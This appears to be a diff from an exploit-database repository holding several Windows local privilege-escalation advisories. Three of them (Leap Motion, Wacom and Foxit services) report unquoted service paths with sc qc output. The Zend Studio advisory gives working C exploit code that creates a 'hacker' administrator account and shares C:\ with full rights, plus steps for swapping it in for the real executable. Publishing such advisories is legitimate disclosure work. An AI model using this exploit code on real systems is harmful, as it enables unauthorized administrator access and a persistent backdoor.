BINARY_PATH_NAME : C:\Program Files (x86)\Leap Motion\Core Services\LeapSvc64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Leap Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

View file

@ -0,0 +1,29 @@
Wacom Consumer Service: http://www.wacom.com
By Ross Marks: http://www.rossmarks.co.uk
Exploit-db: https://www.exploit-db.com/author/?a=8724
Category: Local
Tested on: Windows 10 x86/x64
1) Unquoted Service Path Privilege Escalation
Wacom's "Wacom Consumer Service" installs as a service with an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.
A successful attempt would require the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
PoC:
C:\>sc qc WTabletServiceCon
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WTabletServiceCon
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Tablet\Pen\WtabletServiceCon.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wacom Consumer Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

View file

@ -0,0 +1,29 @@
Foxit Cloud Update Service: https://www.foxitsoftware.com
By Ross Marks: http://www.rossmarks.co.uk
Exploit-db: https://www.exploit-db.com/author/?a=8724
Category: Local
Tested on: Windows 10 x86/x64
1) Unquoted Service Path Privilege Escalation
Foxit reader's "cloud safe update service" installs as a service with an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.
A successful attempt would require the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
PoC:
C:\>sc qc FoxitCloudUpdateService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FoxitCloudUpdateService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\FOXIT SOFTWARE\FOXIT READER\Foxit Cloud\FCUpdateService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Foxit Cloud Safe Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

134
platforms/windows/local/40490.txt Executable file
View file

@ -0,0 +1,134 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ZEND-STUDIO-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec
Vendor:
============
www.zend.com
Product:
======================
ZendStudio IDE v13.5.1
Zend Studio is the leading PHP IDE. It is the only PHP IDE that combines mobile development with PHP and includes a sample mobile
app with source code.
Vulnerability Type:
=====================
Privilege Escalation
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
ZendStudio IDE uses weak insecure permissions settings on its files/directory as the “Everyone” group has full access on it.
Allowing low privileged users to execute arbitrary code in the security context of ANY other users with elevated privileges
on the affected system.
"Everyone" encompasses all users who have logged in with a password as well as built-in, non-password protected accounts such as Guest
and LOCAL_SERVICE.
Any user (even guest) will be able to replace, modify or change the file. This would allow an attacker the ability to inject code or
replace the ZendStudio executable and have it run in the context of the system.
e.g.
c:\Program Files (x86)\Zend\Zend Studio 13.5.1> icacls ZendStudio.exe
ZendStudio.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
x86_64 version ...
c:\Program Files\Zend>icacls * | more
Zend Studio 13.5.1 Everyone:(F)
Everyone:(OI)(CI)(IO)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(I
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Exploit code(s):
===============
1) Compile below 'C' code name it as "ZendStudio.exe"
#include<windows.h>
int main(void){
system("net user hacker abc123 /add");
system("net localgroup Administrators hacker /add");
system("net share SHARE_NAME=c:\ /grant:hacker,full");
WinExec("C:\\Program Files (x86)\\Zend\\Zend Studio 13.5.1\\~ZendStudio.exe",0);
return 0;
}
2) Rename original "ZendStudio.exe" to "~ZendStudio.exe"
3) Place our malicious "ZendStudio.exe" in the ZendStudio directory
4) Logout and wait for a more privileged user to login and use ZendStudio IDE then BOOM!!!!! later,
go back and login with your shiny new account.
Disclosure Timeline:
========================================
Vendor Notification: September 30, 2016
October 8, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx